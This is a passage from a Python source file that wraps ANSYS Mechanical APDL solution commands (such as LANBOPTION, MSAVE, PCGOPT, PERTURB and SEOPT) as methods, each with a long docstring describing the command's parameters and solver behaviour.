This command does not support multiframe restarts
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"GMATRIX,{symfac},{condname},{numcond},,{matrixname}"
return self.run(command, **kwargs)
def lanboption(self, strmck="", **kwargs):
"""Specifies Block Lanczos eigensolver options.
APDL Command: LANBOPTION
strmck
Controls whether the Block Lanczos eigensolver will perform a
Sturm sequence check:
* ``"OFF"`` : Do not perform the Sturm sequence check
(default).
* ``"ON"`` : Perform a Sturm sequence check. This requires
additional matrix factorization (which can be expensive),
but does help ensure that no modes are missed in the
specified range.
Notes
-----
LANBOPTION specifies options to be used with the Block Lanczos
eigensolver during an eigenvalue buckling analysis (BUCOPT,LANB)
or a modal analysis (MODOPT,LANB).
By default the sturm sequence check is off for the Block Lanczos
eigensolver when it is used in a modal analysis, and on when it is
used in a buckling analysis.
"""
return self.run(f"LANBOPTION,{strmck}", **kwargs)
def lumpm(self, key="", **kwargs):
"""Specifies a lumped mass matrix formulation.
APDL Command: LUMPM
Parameters
----------
key
Formulation key:
OFF - Use the element-dependent default mass matrix formulation (default).
ON - Use a lumped mass approximation.
Notes
-----
This command is also valid in PREP7. If used in SOLUTION, this command
is valid only within the first load step.
"""
command = f"LUMPM,{key}"
return self.run(command, **kwargs)
def moddir(self, key="", directory="", fname="", **kwargs):
"""Activates the remote read-only modal files usage.
APDL Command: MODDIR
Parameters
----------
key
Key to activate the remote modal files usage
* ``"1 (ON or YES)"`` : The program performs the analysis
using remote modal files. The files are read-only.
* ``"0 (OFF or NO)"`` : The program performs the analysis
using modal files located in the working directory
(default).
directory
Directory path (248 characters maximum). The directory
contains the modal analysis files. The directory path
defaults to the current working directory.
fname
File name (no extension or directory path) for the modal
analysis files. The file name defaults to the current
Jobname.
Notes
-----
Only applies to spectrum analyses (ANTYPE,SPECTR).
Using the default for both the directory path (Directory) and the
file name (Fname) is not valid. At least one of these values must
be specified.
The MODDIR command must be issued during the first solution and at
the beginning of the solution phase (before LVSCALE in
particular).
Remote modal files usage is not supported when mode file reuse is
activated (modeReuseKey = YES on SPOPT).
"""
return self.run(f"MODDIR,{key},{directory},{fname}", **kwargs)
def monitor(self, var="", node="", lab="", **kwargs):
"""Controls contents of three variable fields in nonlinear solution
APDL Command: MONITOR
monitor file.
Parameters
----------
var
One of three variable field numbers in the monitor file whose
contents can be specified by the Lab field. Valid arguments are
integers 1, 2, or 3. See Notes section for default values.
node
The node number for which information is monitored in the specified
VAR field. In the GUI, if Node = P, graphical picking is enabled.
If blank, the monitor file lists the maximum value of the specified
quantity (Lab field) for the entire structure.
lab
The solution quantity to be monitored in the specified VAR field.
Valid labels for solution quantities are UX, UY, and UZ
(displacements); ROTX, ROTY, and ROTZ (rotations); and TEMP
(temperature). Valid labels for reaction force are FX, FY, and FZ
(structural force) and MX, MY, and MZ (structural moment). Valid
label for heat flow rate is HEAT. For defaults see the Notes
section.
Notes
-----
The monitor file always has an extension of .mntr, and takes its file
name from the specified Jobname. If no Jobname is specified, the file
name defaults to file.
You must issue this command once for each solution quantity you want to
monitor at a specified node at each load step. You cannot monitor a
reaction force during a linear analysis. The variable field contents
can be redefined at each load step by reissuing the command. The
monitored quantities are appended to the file for each load step.
Reaction forces reported in the monitor file may be incorrect if the
degree of freedom of the specified node is involved in externally
defined coupling (CP command) or constraint equations (CE command), or
if the program has applied constraint equations internally to the node.
The following example shows the format of a monitor file. Note that
the file only records the solution substep history when a substep is
convergent.
The following details the contents of the various fields in the monitor
file:
The current load step number.
The current substep (time step) number.
The number of attempts made in solving the current substep. This
number is equal to the number of failed attempts (bisections) plus one
(the successful attempt).
The number of iterations used by the last successful attempt.
Total cumulative number of iterations (including each iteration used by
a bisection).
:
Time or load factor increments for the current substep.
Total time (or load factor) for the last successful attempt in the
current substep.
Variable field 1. In this example, the field is reporting the UZ
value. By default, this field lists the CPU time used up to (but not
including) the current substep.
Variable field 2. In this example, the field is reporting the MZ
value. By default, this field lists the maximum displacement in the
entire structure.
Variable field 3. By default (and in the example), this field reports
the maximum equivalent plastic strain increment in the entire
structure.
"""
command = f"MONITOR,{var},{node},{lab}"
return self.run(command, **kwargs)
def msave(self, key="", **kwargs):
"""Sets the solver memory saving option. This option only applies to the
APDL Command: MSAVE
PCG solver (including PCG Lanczos).
Parameters
----------
key
Activation key:
0 or OFF - Use global assembly for the stiffness matrix (and mass matrix, when using PCG
Lanczos) of the entire model.
1 or ON - Use an element-by-element approach when possible to save memory during the
solution. In this case, the global stiffness (and mass)
matrix is not assembled; element stiffness (and mass) is
regenerated during PCG or PCG Lanczos iterations.
Notes
-----
MSAVE,ON only applies to and is the default for parts of the model
using the following element types with linear material properties that
meet the conditions listed below.
SOLID186 (Structural Solid only)
SOLID187
The following conditions must also be true:
The PCG solver has been specified.
Small strains are assumed (NLGEOM,OFF).
No prestress effects (PSTRES) are included.
All nodes on the supported element types must be defined (i.e., the
midside nodes cannot be removed using the EMID command).
For elements with thermally dependent material properties, MSAVE,ON
applies only to elements with uniform temperatures prescribed.
The default element coordinate system must be used.
If you manually force MSAVE,ON by including it in the input file, the
model can include the following additional conditions:
The analysis can be a modal analysis using the PCG Lanczos method
(MODOPT,LANPCG).
Large deflection effects (NLGEOM,ON) are included.
SOLID185 (brick shapes and KEYOPT(2) = 3 only) elements can be
included.
All other element types or other parts of the model that don't meet the
above criteria will be solved using global assembly (MSAVE,OFF). This
command can result in memory savings of up to 70 percent over the
global assembly approach for the part of the model that meets the
criteria. Depending on the hardware (e.g., processor speed, memory
bandwidth, etc.), the solution time may increase or decrease when this
feature is used.
This memory-saving feature runs in parallel when multiple processors
are used with the /CONFIG command or with Distributed ANSYS. The gain
in performance with using multiple processors with this feature turned
on should be similar to the default case when this feature is turned
off. Performance also improves when using the uniform reduced
integration option for SOLID186 elements.
This command does not support the layered option of the SOLID185 and
SOLID186 elements.
When using MSAVE,ON with the PCGOPT command, note the following
restrictions:
For static and modal analyses, MSAVE,ON is not valid when using a
Lev_Diff value of 5 on the PCGOPT command; Lev_Diff will automatically
be reset to 2.
For modal analyses, MSAVE,ON is not valid with the StrmCk option of the
PCGOPT command; Strmck will be set to OFF.
For all analysis types, MSAVE,ON is not valid when the Lagrange
multiplier option (LM_Key) of the PCGOPT command is set to ON; the
MSAVE activation key will be set to OFF.
For linear perturbation static and modal analyses, MSAVE,ON is not
valid; the MSAVE activation key will be set to OFF.
When using MSAVE,ON for modal analyses, no .FULL file will be created.
The .FULL file may be necessary for subsequent analyses (e.g.,
harmonic, transient mode-superposition, or spectrum analyses). To
generate the .FULL file, rerun the modal analysis using the WRFULL
command.
"""
command = f"MSAVE,{key}"
return self.run(command, **kwargs)
def msolve(self, numslv="", nrmtol="", nrmchkinc="", **kwargs):
"""Starts multiple solutions for random acoustics analysis with diffuse
APDL Command: MSOLVE
sound field.
Parameters
----------
numslv
Number of multiple solutions (load steps) corresponding to the
number of samplings. Default = 1.
Notes
-----
The MSOLVE command starts multiple solutions (load steps) for random
acoustics analysis with multiple samplings.
The process is controlled by the norm convergence tolerance NRMTOL or
the number of multiple solutions NUMSLV (if the solution steps reach
the defined number).
The program checks the norm convergence by comparing two averaged sets
of radiated sound powers with the interval NRMCHKINC over the frequency
range. For example, if NRMCHKINC = 5, the averaged values from 5
solutions are compared with the averaged values from 10 solutions, then
the averaged values from 10 solutions are compared with the averaged
values from 15 solutions, and so on.
The incident diffuse sound field is defined via the DFSWAVE command.
The average result of multiple solutions with different samplings is
calculated via the PLST command.
"""
command = f"MSOLVE,{numslv},{nrmtol},{nrmchkinc}"
return self.run(command, **kwargs)
def opncontrol(self, lab="", value="", numstep="", **kwargs):
"""Sets decision parameter for automatically increasing the time step
APDL Command: OPNCONTROL
interval.
Parameters
----------
lab
DOF
DOF - Degree-of-freedom label used to base a decision for increasing the time step
(substep) interval in a nonlinear or transient analysis.
The only DOF label currently supported is TEMP.
OPENUPFACTOR - Factor for increasing the time step interval. Specify when AUTOTS,ON is issued
and specify a VALUE > 1.0 (up to 10.0). The default
VALUE = 1.5 (except for thermal analysis, where it
is 3.0). Generally, VALUE > 3.0 is not recommended.
value, numstep
Two values used in the algorithm for determining if the time step
interval can be increased. Valid only when Lab = DOF.
Notes
-----
This command is available only for nonlinear or full transient
analysis.
"""
command = f"OPNCONTROL,{lab},{value},{numstep}"
return self.run(command, **kwargs)
def outaero(self, sename="", timeb="", dtime="", **kwargs):
"""Outputs the superelement matrices and load vectors to formatted files
APDL Command: OUTAERO
for aeroelastic analysis.
Parameters
----------
sename
Name of the superelement that models the wind turbine supporting
structure. Defaults to the current Jobname.
timeb
First time at which the load vector is formed (defaults to be read
from SENAME.sub).
dtime
Time step size of the load vectors (defaults to be read from
SENAME.sub).
Notes
-----
Both TIMEB and DTIME must be blank if the time data is to be read from
the SENAME.sub file.
The matrix file (SENAME.SUB) must be available from the substructure
generation run before issuing this command. This superelement that
models the wind turbine supporting structure must contain only one
master node with six freedoms per node: UX, UY, UZ, ROTX, ROTY, ROTZ.
The master node represents the connection point between the turbine and
the supporting structure.
This command will generate four files that are exported to the
aeroelastic code for integrated wind turbine analysis. The four files
are Jobname.GNK for the generalized stiffness matrix, Jobname.GNC for
the generalized damping matrix, Jobname.GNM for the generalized mass
matrix and Jobname.GNF for the generalized load vectors.
For detailed information on how to perform a wind coupling analysis,
see Coupling to External Aeroelastic Analysis of Wind Turbines in the
Mechanical APDL Advanced Analysis Guide.
"""
command = f"OUTAERO,{sename},{timeb},{dtime}"
return self.run(command, **kwargs)
def ovcheck(self, method="", frequency="", set_="", **kwargs):
"""Checks for overconstraint among constraint equations and Lagrange
APDL Command: OVCHECK
multipliers.
Parameters
----------
method
Method used to determine which slave DOFs will be eliminated:
TOPO - Topological approach (default). This method only works with constraint
equations; it does not work with Lagrange multipliers.
ALGE - Algebraic approach.
NONE - Do not use overconstraint detection logic.
frequency
Frequency of overconstraint detection for static or full transient
analyses:
ITERATION - For all equilibrium iterations (default).
SUBSTEP - At the beginning of each substep.
LOADSTEP - At the beginning of each load step.
set\_
Set of equations:
All - Check for overconstraint between all constraint equations (default).
LAG - Check for overconstraint only on the set of equations that involves Lagrange
multipliers. This is faster than checking all sets,
especially when the model contains large MPC bonded contact
pairs.
Notes
-----
The OVCHECK command checks for overconstraint among the constraint
equations (CE/CP) and the Lagrange multipliers for the globally
assembled stiffness matrix. If overconstrained constraint equations or
Lagrange multipliers are detected, they are automatically removed from
the system of equations.
The constraint equations that are identified as redundant are removed
from the system and printed to the output file. It is very important
that you check the removed equations—they may lead to convergence
issues, especially for nonlinear analyses.
The Frequency and Set arguments are active only for the topological
method (Method = TOPO). If you do not issue the OVCHECK command,
overconstraint detection is performed topologically, and the slave DOFs
are also determined topologically.
Overconstraint detection slows down the run. We recommend using it to
validate that your model does not contain any overconstraints. Then,
you can switch back to the default method (no OVCHECK command is
needed).
As an example, consider the redundant set of constraint equations
defined below:
Equation number 2 will be removed by the overconstraint detection
logic. However, this is an arbitrary decision since equation number 1
could be removed instead. This is an important choice as the constant
term is not the same in these two constraint equations. Therefore, you
must check the removed constraint equations carefully.
For detailed information on the topological and algebraic methods of
overconstraint detection, see Constraints: Automatic Selection of Slave
DOFs in the Mechanical APDL Theory Reference
"""
command = f"OVCHECK,{method},{frequency},{set_}"
return self.run(command, **kwargs)
def pcgopt(
self,
lev_diff="",
reduceio="",
strmck="",
wrtfull="",
memory="",
lm_key="",
**kwargs,
):
"""Controls PCG solver options.
APDL Command: PCGOPT
Parameters
----------
lev_diff
Indicates the level of difficulty of the analysis. Valid
settings are AUTO or 0 (default), 1, 2, 3, 4, or 5. This
option applies to both the PCG solver when used in static
and full transient analyses and to the PCG Lanczos method
in modal analyses. Use AUTO to let ANSYS automatically
choose the proper level of difficulty for the model. Lower
values (1 or 2) generally provide the best performance for
well-conditioned problems. Values of 3 or 4 generally
provide the best performance for ill-conditioned problems;
however, higher values may increase the solution time for
well-conditioned problems. Higher level-of-difficulty
values typically require more memory. Using the highest
value of 5 essentially performs a factorization of the
global matrix (similar to the sparse solver) and may
require a very large amount of memory. If necessary, use
Memory to reduce the memory usage when using Lev_Diff = 5.
Lev_Diff = 5 is generally recommended for small- to
medium-sized problems when using the PCG Lanczos mode
extraction method.
reduceio
Controls whether the PCG solver will attempt to reduce I/O
performed during equation solution:
AUTO - Automatically chooses whether to reduce I/O or not
(default).
YES - Reduces I/O performed during equation solution in
order to reduce total solver time.
NO - Does NOT reduce I/O performed during equation solution.
strmck
Controls whether or not a Sturm sequence check is performed:
OFF - Does NOT perform Sturm sequence check (default).
ON - Performs Sturm sequence check
wrtfull
Controls whether or not the .FULL file is written.
ON - Write .FULL file (default)
OFF - Do not write .FULL file.
memory
Controls whether to run using in-core or out-of-core mode
when using Lev_Diff = 5.
AUTO - Automatically chooses which mode to use (default).
INCORE - Run using in-core mode.
OOC - Run using out-of-core mode.
lm_key
Controls use of the PCG solver for MPC184 Lagrange
multiplier method elements. This option applies only to
the PCG solver when used in static and full transient
analyses.
OFF - Do not use the PCG solver for the MPC184 Lagrange
multiplier method (default).
ON - Allow use of the PCG solver for the MPC184 Lagrange
multiplier method.
Notes
-----
ReduceIO works independently of the MSAVE command in the PCG
solver. Setting ReduceIO to YES can significantly increase
the memory usage in the PCG solver.
To minimize the memory used by the PCG solver with respect to
the Lev_Diff option only, set Lev_Diff = 1 if you do not have
sufficient memory to run the PCG solver with Lev_Diff = AUTO.
The MSAVE,ON command is not valid when using Lev_Diff = 5. In
this case, the Lev_Diff value will automatically be reset to
2. The MSAVE,ON command is also not valid with the StrmCk
option. In this case, StrmCk will be set to OFF.
Distributed ANSYS Restriction: The Memory option and the
LM_Key option are not supported in Distributed ANSYS.
"""
command = f"PCGOPT,{lev_diff},,{reduceio},{strmck},{wrtfull},{memory},{lm_key}"
return self.run(command, **kwargs)
def perturb(self, type_="", matkey="", contkey="", loadcontrol="", **kwargs):
"""Sets linear perturbation analysis options.
APDL Command: PERTURB
Parameters
----------
type\_
Type of linear perturbation analysis to be performed:
STATIC - Perform a linear perturbation static analysis.
MODAL - Perform a linear perturbation modal analysis.
BUCKLE - Perform a linear perturbation eigenvalue buckling analysis.
HARMONIC - Perform a linear perturbation full harmonic analysis.
SUBSTR - Perform a linear perturbation substructure generation pass.
OFF - Do not perform a linear perturbation analysis (default).
matkey
Key for specifying how the linear perturbation analysis uses
material properties, valid for all structural elements except
contact elements. For more information, see Linear Perturbation
Analysis in the Mechanical APDL Theory Reference.
AUTO - The program selects the material properties for the linear perturbation
analysis automatically (default). The materials are handled
in the following way:
For pure linear elastic materials used in the base analysis, the same properties are used in the linear perturbation analysis. - For hyperelastic materials used in the base analysis, the material properties
are assumed to be linear elastic in the linear
perturbation analysis. The material property data
(or material Jacobian) is obtained based on the
tangent of the hyperelastic material's
constitutive law at the point where restart
occurs.
For any nonlinear materials other than hyperelastic materials used in the base analysis, the material properties are assumed to be linear elastic in the linear perturbation analysis. The material data is the same as the linear portion of the nonlinear materials (that is, the parts defined by MP commands). - For COMBIN39, the stiffness is that of the first segment of the force-
deflection curve.
TANGENT - Use the tangent (material Jacobian) on the material constitutive curve as the
material property. The material property remains linear
in the linear perturbation analysis and is obtained at
the point of the base analysis where restart occurs. The
materials are handled in the following way:
For pure linear elastic materials used in the base analysis, the same properties are used in the linear perturbation analysis. Because the material constitutive curve is linear, the tangent is the same as the base analysis. - For hyperelastic materials used in the base analysis, the program uses the same
tangent as that used for MatKey = AUTO, and the
results are therefore identical.
For any nonlinear materials other than hyperelastic materials used in the base analysis, the material properties are obtained via the material tangent on the material constitutive curve at the restart point of the base analysis. - The materials and properties typically differ from Matkey = AUTO, but it is
possible the results could be identical or very
similar if a.) the material is elasto-plastic
rate-independent and is unloading (or has neutral
loading) at the restart point, or b.) the
material is rate-dependent, depending on the
material properties and loading conditions.
For COMBIN39, the stiffness is equal to the tangent of the current segment of the force-deflection curve. - In a modal restart solution that follows a linear perturbation modal analysis,
the TANGENT option is overridden by the AUTO
option and linear material properties are used
for stress calculations in the modal restart. See
the discussion in the Notes for more information.
contkey
Key that controls contact status for the linear perturbation
analysis. This key controls all contact elements (TARGE169,
TARGE170, and CONTA171 through CONTA178) globally for all contact
pairs. Alternatively, contact status can be controlled locally per
contact pair by using the CNKMOD command. Note that the contact
status from the base analysis solution is always adjusted by the
local contact controls specified by CNKMOD first and then modified
by the global sticking or bonded control (ContKey = STICKING or
BONDED). The tables in the Notes section show how the contact
status is adjusted by CNKMOD and/or the ContKey setting.
CURRENT - Use the current contact status from the restart
snapshot (default). If the previous run is
nonlinear, then the nonlinear contact status at
the point of restart is frozen and used
throughout the linear perturbation analysis.
STICKING - For frictional contact pairs (MU > 0), use
sticking contact (e.g., ``MU*KN`` for tangential
contact stiffness) everywhere the contact state
is closed (i.e., status is sticking or
sliding). This option only applies to contact
pairs that are in contact and have a frictional
coefficient MU greater than zero. Contact pairs
without friction (MU = 0) and in a sliding
state remain free to slide in the linear
perturbation analysis.
BONDED - Any contact pairs that are in the closed
(sticking or sliding) state are moved to bonded
(for example, KN for both normal and tangential
contact stiffness). Contact pairs that have a
status of far-field or near-field remain open.
loadcontrol
Key that controls how the load vector of {Fperturbed} is
calculated. This control is provided for convenience of load
generation for linear perturbation analysis. In general, a new set
of loads is required for a linear perturbation analysis. This key
controls all mechanical loads; it does not affect non-mechanical
loads. Non-mechanical loads (including thermal loads) are always
kept (i.e., not deleted).
ALLKEEP - Keep all the boundary conditions (loads and
constraints) from the end of the load step of
the current restart point. This option is
convenient for further load application and is
useful for a linear perturbation analysis
restarted from a previous linear analysis. For
this option, {Fend} is the total load vector at
the end of the load step at the restart point.
INERKEEP - Delete all loads and constraints from the
restart step, except for displacement
constraints and inertia loads (default). All
displacement constraints and inertia loads are
kept for convenience when performing the linear
perturbation analysis. Note that nonzero and
tabular displacement constraints can be
considered as external loads; however, they are
not deleted when using this option.
PARKEEP - Delete all loads and constraints from the
restart step, except for displacement
constraints. All displacement constraints are
kept for convenience when performing the linear
perturbation analysis. Note that nonzero and
tabular displacement constraints can be
considered as external loads; however, they are
not deleted when using this option.
DZEROKEEP - Behaves the same as the PARKEEP option, except
that all nonzero displacement constraints are
set to zero upon the onset of linear
perturbation.
NOKEEP - Delete all the loads and constraints, including
all displacement constraints. For this option,
{Fend} is zero unless non-mechanical loads (e.g.,
thermal loads) are present.
Notes
-----
This command controls options relating to linear perturbation analyses.
It must be issued in the first phase of a linear perturbation analysis.
This command is also valid in PREP7.
"""
command = f"PERTURB,{type_},{matkey},{contkey},{loadcontrol}"
return self.run(command, **kwargs)
def prscontrol(self, key="", **kwargs):
"""Specifies whether to include pressure load stiffness in the element
APDL Command: PRSCONTROL
stiffness formation.
Parameters
----------
key
Pressure load stiffness key. In general, use the default setting.
Use a non-default setting only if you encounter convergence
difficulties. Pressure load stiffness is automatically included
when using eigenvalue buckling analyses (ANTYPE,BUCKLE), equivalent
to Key = INCP. For all other types of analyses, valid arguments for
Key are:
NOPL - Pressure load stiffness not included for any elements.
(blank) (default) - Include pressure load stiffness for elements SURF153, SURF154, SURF156,
SURF159, SHELL181, PLANE182, PLANE183, SOLID185,
SOLID186, SOLID187, SOLSH190, BEAM188, BEAM189,
FOLLW201, SHELL208, SHELL209, SOLID272, SOLID273,
SHELL281, SOLID285, PIPE288, PIPE289, and
ELBOW290. Do not include pressure load stiffness
for elements SOLID65.
INCP - Pressure load stiffness included for all of the default elements listed above
and SOLID65.
Notes
-----
This command is rarely needed. The default settings are recommended for
most analyses.
"""
command = f"PRSCONTROL,{key}"
return self.run(command, **kwargs)
def pscontrol(self, option="", key="", **kwargs):
"""Enables or disables shared-memory parallel operations.
APDL Command: PSCONTROL
Parameters
----------
option
Specify the operations for which you intend to enable/disable
parallel behavior:
ALL - Enable/disable parallel for all areas (default).
PREP - Enable/disable parallel during preprocessing (/PREP7).
SOLU - Enable/disable parallel during solution (/SOLU).
FORM - Enable/disable parallel during element matrix generation.
SOLV - Enable/disable parallel during equation solver.
RESU - Enable/disable parallel during element results calculation.
POST - Enable/disable parallel during postprocessing (/POST1 and /POST26).
STAT - List parallel operations that are enabled/disabled.
key
Option control key. Used for all Option values except STAT.
ON - Enable parallel operation.
OFF - Disable parallel operation.
Notes
-----
Use this command in shared-memory parallel operations.
This command is useful when you encounter minor discrepancies in a
nonlinear solution when using different numbers of processors. A
parallel operation applied to the element matrix generation can produce
a different nonlinear solution with a different number of processors.
Although the nonlinear solution converges to the same nonlinear
tolerance, the minor discrepancy created may not be desirable for
consistency.
Enabling/disabling parallel behavior for the solution (Option = SOLU)
supersedes the activation/deactivation of parallel behavior for element
matrix generation (FORM), equation solver (SOLV), and element results
calculation (RESU).
The SOLV option supports only the sparse direct and PCG solvers
(EQSLV,SPARSE or PCG). No other solvers are supported.
This command applies only to shared-memory architecture. It does not
apply to the Distributed ANSYS product.
"""
command = f"PSCONTROL,{option},{key}"
return self.run(command, **kwargs)
def rate(self, option="", **kwargs):
"""Specifies whether the effect of creep strain rate will be used in the
APDL Command: RATE
solution of a load step.
Parameters
----------
option
Activates implicit creep analysis.
0 or OFF - No implicit creep analysis. This option is the default.
1 or ON - Perform implicit creep analysis.
Notes
-----
Set Option = 1 (or ON) to perform an implicit creep analysis (TB,CREEP
with TBOPT : 1). For viscoplasticity/creep analysis, Option specifies
whether or not to include the creep calculation in the solution of a
load step. If Option = 1 (or ON), ANSYS performs the creep calculation.
Set an appropriate time for solving the load step via a TIME,TIME
command.
"""
command = f"RATE,{option}"
return self.run(command, **kwargs)
def resvec(self, key="", **kwargs):
"""Calculates or includes residual vectors.
APDL Command: RESVEC
Parameters
----------
key
Residual vector key:
OFF - Do not calculate or include residual vectors. This option is the default.
ON - Calculate or include residual vectors.
Notes
-----
In a modal analysis, the RESVEC command calculates residual vectors. In
a mode-superposition transient dynamic, mode-superposition harmonic,
PSD or spectrum analysis, the command includes residual vectors.
In a component mode synthesis (CMS) generation pass, the RESVEC command
calculates one residual vector which is included in the normal modes
basis used in the transformation matrix. It is supported for the three
available CMS methods. RESVEC,ON can only be specified in the first
load step of a generation pass and is ignored if issued at another load
step.
If rigid-body modes exist, pseudo-constraints are required for the
calculation. Issue the D,,,SUPPORT command to specify only the minimum
number of pseudo-constraints necessary to prevent rigid-body motion.
For more information about residual vector formulation, see Residual
Vector Method in the Mechanical APDL Theory Reference.
"""
command = f"RESVEC,{key}"
return self.run(command, **kwargs)
def rstoff(self, lab="", offset="", **kwargs):
"""Offsets node or element IDs in the FE geometry record.
APDL Command: RSTOFF
Parameters
----------
lab
The offset type:
NODE - Offset the node IDs.
ELEM - Offset the element IDs.
offset
A positive integer value specifying the offset value to apply. The
value must be greater than the number of nodes or elements in the
existing superelement results file.
Notes
-----
The RSTOFF command offsets node or element IDs in the FE geometry
record saved in the .rst results file. Use the command when expanding
superelements in a bottom-up substructuring analysis (where each
superelement is generated individually in a generation pass, and all
superelements are assembled together in the use pass).
With appropriate offsets, you can write results files with unique node
or element IDs and thus display the entire model even if the original
superelements have overlapping element or node ID sets. (Such results
files are incompatible with the .db database file saved at the
generation pass.)
The offset that you specify is based on the original superelement node
or element numbering, rather than on any offset specified via a SESYMM
or SETRAN command. When issuing an RSTOFF command, avoid specifying an
offset that creates conflicting node or element numbers for a
superelement generated via a SESYMM or SETRAN command.
If you issue the command to set non-zero offsets for node or element
IDs, you must bring the geometry into the database via the SET command
so that ANSYS can display the results. You must specify appropriate
offsets to avoid overlapping node or element IDs with other
superelement results files.
The command is valid only in the first load step of a superelement
expansion pass.
"""
command = f"RSTOFF,{lab},{offset}"
return self.run(command, **kwargs)
def scopt(self, tempdepkey="", **kwargs):
"""Specifies System Coupling options.
APDL Command: SCOPT
Parameters
----------
tempdepkey
Temperature-dependent behavior key based on the convection
coefficient:
* ``"YES"`` : A negative convection coefficient, -N, is
assumed to be a function of temperature and is determined
from the HF property table for material N (MP command). This
is the default.
* ``"NO"`` : A negative convection coefficient, -N, is used as
is in the convection calculation.
Notes
-----
By default in the Mechanical APDL program, a negative convection
coefficient value triggers temperature-dependent behavior. In
System Coupling, and in some one-way CFD to Mechanical APDL
thermal simulations, it is desirable to allow convection
coefficients to be used as negative values. To do so, issue the
command ``scopt("NO")``.
"""
return self.run(f"SCOPT,{tempdepkey}", **kwargs)
def seexp(self, sename="", usefil="", imagky="", expopt="", **kwargs):
"""Specifies options for the substructure expansion pass.
APDL Command: SEEXP
Parameters
----------
sename
The name (case-sensitive) of the superelement matrix file created
by the substructure generation pass (Sename.SUB). Defaults to the
initial jobname File. If a number, it is the element number of the
superelement as used in the use pass.
usefil
The name of the file containing the superelement degree-of-freedom
(DOF) solution created by the substructure use pass (Usefil.DSUB).
imagky
Key to specify use of the imaginary component of the DOF solution.
Applicable only if the use pass is a harmonic (ANTYPE,HARMIC)
analysis:
OFF - Use real component of DOF solution (default).
ON - Use imaginary component of DOF solution.
expopt
Key to specify whether the superelement (ANTYPE,SUBSTR) expansion
pass (EXPASS,ON) should transform the geometry:
OFF - Do not transform node or element locations (default).
ON - Transform node or element locations in the FE geometry record of the .rst
results file.
Notes
-----
Specifies options for the expansion pass of the substructure analysis
(ANTYPE,SUBSTR). If used in SOLUTION, this command is valid only
within the first load step.
If you specify geometry transformation (Expopt = ON), you must retrieve
the transformation matrix (if it exists) from the specified .SUB file.
The command updates the nodal X, Y, and Z coordinates to represent the
transformed node locations. The Expopt option is useful when you want
to expand superelements created from other superelements (via SETRAN or
SESYMM commands). For more information, see Superelement Expansion in
Transformed Locations and Plotting or Printing Mode Shapes.
This command is also valid in /PREP7.
"""
command = f"SEEXP,{sename},{usefil},{imagky},{expopt}"
return self.run(command, **kwargs)
def seopt(
self, sename="", sematr="", sepr="", sesst="", expmth="", seoclvl="", **kwargs
):
"""Specifies substructure analysis options.
APDL Command: SEOPT
Parameters
----------
sename
The name (case-sensitive, thirty-two character maximum) assigned to
the superelement matrix file. The matrix file will be named
Sename.SUB. This field defaults to Fname on the /FILNAME command.
sematr
Matrix generation key:
1 - Generate stiffness (or conductivity) matrix (default).
2 - Generate stiffness and mass (or conductivity and specific heat) matrices.
3 - Generate stiffness, mass and damping matrices.
sepr
Print key:
0 - Do not print superelement matrices or load vectors.
1 - Print both load vectors and superelement matrices.
2 - Print load vectors but not matrices.
sesst
Stress stiffening key:
0 - Do not save space for stress stiffening in a later run.
1 - Save space for the stress stiffening matrix (calculated in a subsequent
generation run after the expansion pass).
expmth
Expansion method for expansion pass:
BACKSUB - Save necessary factorized matrix files for backsubstitution during subsequent
expansion passes (default). This normally results in a
large usage of disk space
RESOLVE - Do not save factorized matrix files. Global stiffness matrix will be reformed
during expansion pass. This option provides an effective
way to save disk space usage. This option cannot be used
if the use pass uses large deflections (NLGEOM,ON).
seoclvl
For the added-mass calculation, the ocean level to use when ocean
waves (OCTYPE,,WAVE) are present:
ATP - The ocean level at this point in time (default).
MSL - The mean ocean level.
Notes
-----
The SEOPT command specifies substructure analysis options
(ANTYPE,SUBSTR). If used during solution, the command is valid only
within the first load step.
When ocean waves (OCTYPE,,WAVE) are present, the SeOcLvL argument
specifies the ocean height or level to use for the added-mass
calculation, as the use-run analysis type is unknown during the
generation run.
The expansion pass method RESOLVE is not supported with component mode
synthesis analysis (CMSOPT). ExpMth is automatically set to BACKSUB for
CMS analysis. The RESOLVE method invalidates the use of the NUMEXP
command. The RESOLVE method does not allow the computation of results
based on nodal velocity and nodal acceleration (damping force, inertial
force, kinetic energy, etc.) in the substructure expansion pass.
This command is also valid in PREP7.
"""
command = f"SEOPT,{sename},{sematr},{sepr},{sesst},{expmth},{seoclvl}"
return self.run(command, **kwargs)
def snoption(
self,
rangefact="",
blocksize="",
robustlev="",
compute="",
solve_info="",
**kwargs,
):
"""Specifies Supernode (SNODE) eigensolver options.
APDL Command: SNOPTION
Parameters
----------
rangefact
Factor used to control the range of eigenvalues computed for each
supernode. The value of RangeFact must be a number between 1.0 and
5.0. By default the RangeFact value is set to 2.0, which means that
all eigenvalues between 0 and ``2*FREQE`` are computed for each
supernode (where FREQE is the upper end of the frequency range of
interest as specified on the MODOPT command). As the RangeFact
value increases, the eigensolution for the SNODE solver becomes
more accurate and the computational time increases.
blocksize
BlockSize to be used when computing the final eigenvectors. The
value of Blocksize must be either MAX or a number between 1 and
NMODE, where NMODE is the number of modes to be computed as set on
the MODOPT command. Input a value of MAX to force the algorithm to
allocate enough memory to hold all of the final eigenvectors in
memory and, therefore, only read through the file containing the
supernode eigenvectors once. Note that this setting is ONLY
recommended when there is sufficient physical memory on the machine
to safely hold all of the final eigenvectors in memory.
robustlev
Parameter used to control the robustness of the SNODE eigensolver.
The value of RobustLev must be a number between 0 and 10. Lower
values of RobustLev allow the eigensolver to run in the most
efficient manner for optimal performance. Higher values of
RobustLev often slow down the performance of the eigensolver, but
can increase the robustness; this may be desirable if a problem is
detected with the eigensolver or its eigensolution.
compute
Key to control which computations are performed by the Supernode
eigensolver:
EVALUE - The eigensolver computes only the eigenvalues.
EVECTOR - The eigensolver computes only the eigenvectors
(must be preceded by a modal analysis where the
eigenvalues were computed using the Supernode
eigensolver).
BOTH - The eigensolver computes both the eigenvalues and
eigenvectors in the same pass (default).
solve_info
Solver output option:
OFF - Turns off additional output printing from the
Supernode eigensolver (default).
PERFORMANCE - Turns on additional output printing from the
Supernode eigensolver, including a
performance summary and a summary of file
I/O for the Supernode
eigensolver. Information on memory usage
during assembly of the global matrices (that
is, creation of the Jobname.FULL file) is
also printed with this option.
Notes
-----
This command specifies options for the Supernode (SNODE)
eigensolver.
Setting RangeFact to a value greater than 2.0 will improve the
accuracy of the computed eigenvalues and eigenvectors, but
will often increase the computing time of the SNODE
eigensolver. Conversely, setting RangeFact to a value less
than 2.0 will deteriorate the accuracy of the computed
